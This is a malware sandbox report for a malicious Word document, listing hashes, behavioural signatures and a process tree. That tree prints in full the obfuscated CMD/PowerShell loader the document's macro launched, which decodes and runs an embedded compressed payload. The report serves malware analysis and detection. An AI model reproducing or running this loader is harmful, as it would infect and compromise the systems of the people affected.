Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
100s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
28/05/2024, 23:32
Behavioral task
behavioral1
Sample
7ec769008580eb7db187b9a46643629a_JaffaCakes118.doc
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
7ec769008580eb7db187b9a46643629a_JaffaCakes118.doc
Resource
win10v2004-20240426-en
General
-
Target
7ec769008580eb7db187b9a46643629a_JaffaCakes118.doc
-
Size
80KB
-
MD5
7ec769008580eb7db187b9a46643629a
-
SHA1
2d6be3a810c9797d1943551cf17b8d3e5d21e053
-
SHA256
01e850c472afd03b8855f4b8a44715df7fd402284a620e89056ace9ccaf89317
-
SHA512
acd61402470a948837f91596f1db1ab74213c2e8d114244b1008d6ec3fd11f578a4b04c5cc65beff404f70c7000c4e8e774305334b3f67c6f024e429d8690ca0
-
SSDEEP
768:gI6NVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9FVorXUomQwEHcwRZ:gFNocn1kp59gxBK85fBt+a9OXUDd
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4856 1416 CMD.exe 81 -
Blocklisted process makes network request 6 IoCs
flow pid Process 25 3932 powershell.exe 26 3932 powershell.exe 28 3932 powershell.exe 29 3932 powershell.exe 32 3932 powershell.exe 34 3932 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 1416 WINWORD.EXE 1416 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3932 powershell.exe 3932 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3932 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1416 WINWORD.EXE 1416 WINWORD.EXE 1416 WINWORD.EXE 1416 WINWORD.EXE 1416 WINWORD.EXE 1416 WINWORD.EXE 1416 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1416 wrote to memory of 4856 1416 WINWORD.EXE 86 PID 1416 wrote to memory of 4856 1416 WINWORD.EXE 86 PID 4856 wrote to memory of 3932 4856 CMD.exe 88 PID 4856 wrote to memory of 3932 4856 CMD.exe 88
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7ec769008580eb7db187b9a46643629a_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SYSTEM32\CMD.exeCMD C:\windowS\sYsTeM32\cmd /C "SEt dlV=(("{93}{86}{31}{95}{45}{77}{35}{43}{58}{30}{28}{74}{68}{42}{26}{70}{57}{23}{78}{34}{32}{17}{129}{52}{116}{71}{73}{16}{99}{127}{115}{6}{137}{134}{108}{83}{88}{106}{90}{19}{29}{96}{66}{110}{11}{51}{38}{25}{10}{107}{111}{56}{105}{67}{97}{109}{113}{33}{128}{130}{69}{133}{55}{48}{91}{72}{102}{101}{104}{112}{61}{9}{49}{124}{89}{39}{123}{46}{15}{76}{18}{44}{121}{20}{3}{79}{75}{8}{7}{92}{126}{117}{22}{120}{119}{135}{84}{87}{50}{65}{82}{53}{81}{136}{54}{37}{122}{132}{41}{2}{27}{14}{60}{24}{62}{114}{100}{59}{85}{131}{63}{0}{21}{13}{103}{118}{98}{5}{64}{94}{36}{47}{125}{40}{12}{4}{80}{1}" -f'D()3rZ',')','b','JK','N6qs','NVe','vPyv','6','g5Ko','PSF','HaCX','OY','s-JoI','( ','E','n7c','ON','Si8C','ZL','ZQvjca','wlQUtncGsi',' .','s','NG(','t','vB','mbaSE64','j','MoRY','L','iO.mE','ompre','wFIb/','/9','Bda8I','rEA','FEREnce','rZF','1jUatjsw7Pp','e','x6q','w-O','veRt]::fRo','M(','3','EFLa','l7Q/11I/A',')[','nyhD','f5','resS','gzz7eIW1LZ','DDYHhoL7','reSsiOnMODe','OmpReSs)3','k','eW2S+','TRI',' [','nCodinG]::AS','c','qd8yBV',' sYSTeM.io.streaM','aDtoeN','rbOsEpR','iO','YMp5ZyWCitO','cqQvd','M][coN','m9AF','s','FMuZABrtJ','NB9m','0y','StREA','Ro8R','ME2Tl','tESt','6qsNZ','rxtR','6qs',']::DE','n.COMP','yDwm','o.','Cii','O.C','cOmP','QN','ibTL','L','49Pl','ssw/AM=6qs',' ( nEw-ObjEct i','E','sSIoN.d','Apiep/TGrGdcx5C','1CZnu20Geu6','BU','qUmJp41T','AdER( BUN_,[Text.e','HQTu','WfE7D9HO','([S','k','4+fT+u1zdWcHd1Qu9NGP','y','yr','UbiFkrt','Sjd','BlZ6HNlP','R','vnY58ShmcgI','d3XkmFdMV','rE','4dz','QOi',',[sy','TRiNG]','em.','t','cA185CM','orE','m','32','1,3]+6qs',')','+t+Xit','4s','sbgm','VzvKNm0s',')} ).Re','ACh { nE','TQUpg','Xn9','I','C','JxD')).rePlace('BUN',[sTRing][cHAr]36).rePlace(([cHAr]54+[cHAr]113+[cHAr]115),[sTRing][cHAr]39).rePlace(([cHAr]51+[cHAr]114+[cHAr]90),[sTRing][cHAr]124)^| . ( $PSHOME[4]+$pshOme[30]+'x')&& POWerSHelL ${eXECUTIONCoNtEXT}.\"iNvo`k`eCOmM`AND\".( \"{1}{2}{0}\" -f'IpT','InV','OKeSCR').Invoke( (.( 'LS') ( \"{0}{1}\" -f 'eNV:','DLV' ) ).\"vA`lUe\" )"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWerSHelL ${eXECUTIONCoNtEXT}.\"iNvo`k`eCOmM`AND\".( \"{1}{2}{0}\" -f'IpT','InV','OKeSCR').Invoke( (.( 'LS') ( \"{0}{1}\" -f 'eNV:','DLV' ) ).\"vA`lUe\" )3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82